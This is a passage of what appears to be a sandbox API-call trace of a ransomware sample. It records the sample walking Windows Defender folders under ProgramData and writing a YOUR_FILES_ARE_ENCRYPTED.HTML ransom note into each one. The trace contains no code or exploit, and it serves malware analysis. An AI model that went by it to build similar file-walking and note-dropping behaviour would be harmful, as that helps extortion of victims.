param_1=0x19e6d6, param_2="%02X" | out: param_1="24") returned 2 [0107.444] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="A1") returned 2 [0107.444] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="7C") returned 2 [0107.444] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="CB") returned 2 [0107.444] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="8B") returned 2 [0107.444] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="0C") returned 2 [0107.444] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="C3") returned 2 [0107.444] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="26") returned 2 [0107.444] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="5C") returned 2 [0107.444] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="20") returned 2 [0107.444] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="D4") returned 2 [0107.444] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="09") returned 2 [0107.444] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="EA") returned 2 [0107.444] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="D7") returned 2 [0107.444] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="09") returned 2 [0107.444] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="74") returned 2 [0107.444] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="19") returned 2 [0107.444] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="D2") returned 2 [0107.444] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="20") returned 2 [0107.444] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="24") returned 2 [0107.444] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="A6") returned 2 [0107.444] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="AD") returned 2 [0107.444] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="A9") returned 2 [0107.444] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="53") returned 2 [0107.444] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="CE") returned 2 [0107.445] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="59") returned 2 [0107.445] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="E7") returned 2 [0107.445] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="48") returned 2 [0107.445] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="DD") returned 2 [0107.445] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="61") returned 2 [0107.445] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="4E") returned 2 [0107.445] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\NisLog.txt" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\NisLog.txt") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\NisLog.txt" [0107.445] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.445] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0107.445] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf926e663, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf926e663, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3ae0e073, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x64b7, dwReserved0=0x631218, dwReserved1=0x631188, cFileName="NisLog.txt", cAlternateFileName="")) returned 0 [0107.445] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.446] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.446] GetProcessHeap () returned 0x600000 [0107.446] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f19f0 [0107.446] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\network inspection system\\support\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.446] WriteFile (in: hFile=0x32c, lpBuffer=0x6f19f0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6f19f0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.447] CloseHandle (hObject=0x32c) returned 1 [0107.448] GetProcessHeap () returned 0x600000 [0107.448] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x600000) returned 1 [0107.448] GetProcessHeap () returned 0x600000 [0107.448] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0107.448] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="Support", cAlternateFileName="")) returned 0 [0107.448] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0107.448] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0107.448] GetProcessHeap () returned 0x600000 [0107.449] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f19f0 [0107.449] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\network inspection system\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.449] WriteFile (in: hFile=0x31c, lpBuffer=0x6f19f0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6f19f0*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.450] CloseHandle (hObject=0x31c) returned 1 [0107.451] GetProcessHeap () returned 0x600000 [0107.451] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x600000) returned 1 [0107.451] GetProcessHeap () returned 0x600000 [0107.451] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.452] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Quarantine", cAlternateFileName="QUARAN~1")) returned 1 [0107.452] StrStrIW (lpFirst="Quarantine", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.452] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine") returned 56 [0107.452] GetProcessHeap () returned 0x600000 [0107.452] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0107.453] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine" [0107.453] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*" [0107.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.458] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 1 [0107.458] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 0 [0107.458] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.458] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0107.458] GetProcessHeap () returned 0x600000 [0107.458] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f19f0 [0107.459] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\quarantine\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.459] WriteFile (in: hFile=0x31c, lpBuffer=0x6f19f0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6f19f0*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.460] CloseHandle (hObject=0x31c) returned 1 [0107.461] GetProcessHeap () returned 0x600000 [0107.461] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x600000) returned 1 [0107.461] GetProcessHeap () returned 0x600000 [0107.461] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.461] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Scans", cAlternateFileName="")) returned 1 [0107.461] StrStrIW (lpFirst="Scans", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.461] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans") returned 51 [0107.461] GetProcessHeap () returned 0x600000 [0107.462] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0107.463] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans" [0107.463] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*" [0107.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.469] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 1 [0107.470] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="CleanFileTelemetry", cAlternateFileName="CLEANF~1")) returned 1 [0107.470] StrStrIW (lpFirst="CleanFileTelemetry", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.470] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry") returned 70 [0107.470] GetProcessHeap () returned 0x600000 [0107.470] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0107.471] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry" [0107.471] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry\\*" [0107.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0107.472] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="..", cAlternateFileName="")) returned 1 [0107.472] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="..", cAlternateFileName="")) returned 0 [0107.472] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0107.472] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0107.472] GetProcessHeap () returned 0x600000 [0107.472] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f19f0 [0107.472] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\cleanfiletelemetry\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.473] WriteFile (in: hFile=0x314, lpBuffer=0x6f19f0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6f19f0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.474] CloseHandle (hObject=0x314) returned 1 [0107.474] GetProcessHeap () returned 0x600000 [0107.474] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x600000) returned 1 [0107.474] GetProcessHeap () returned 0x600000 [0107.474] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0107.475] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="CleanStore", cAlternateFileName="CLEANS~1")) returned 1 [0107.475] StrStrIW (lpFirst="CleanStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.475] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore") returned 62 [0107.475] GetProcessHeap () returned 0x600000 [0107.475] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0107.476] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore" [0107.476] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\*" [0107.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0107.477] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="..", cAlternateFileName="")) returned 1 [0107.477] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="Entries", cAlternateFileName="")) returned 1 [0107.477] StrStrIW (lpFirst="Entries", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.477] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries") returned 70 [0107.477] GetProcessHeap () returned 0x600000 [0107.477] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.479] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries" [0107.479] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries\\*" [0107.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0107.479] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.479] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 0 [0107.479] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0107.479] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0107.479] GetProcessHeap () returned 0x600000 [0107.479] 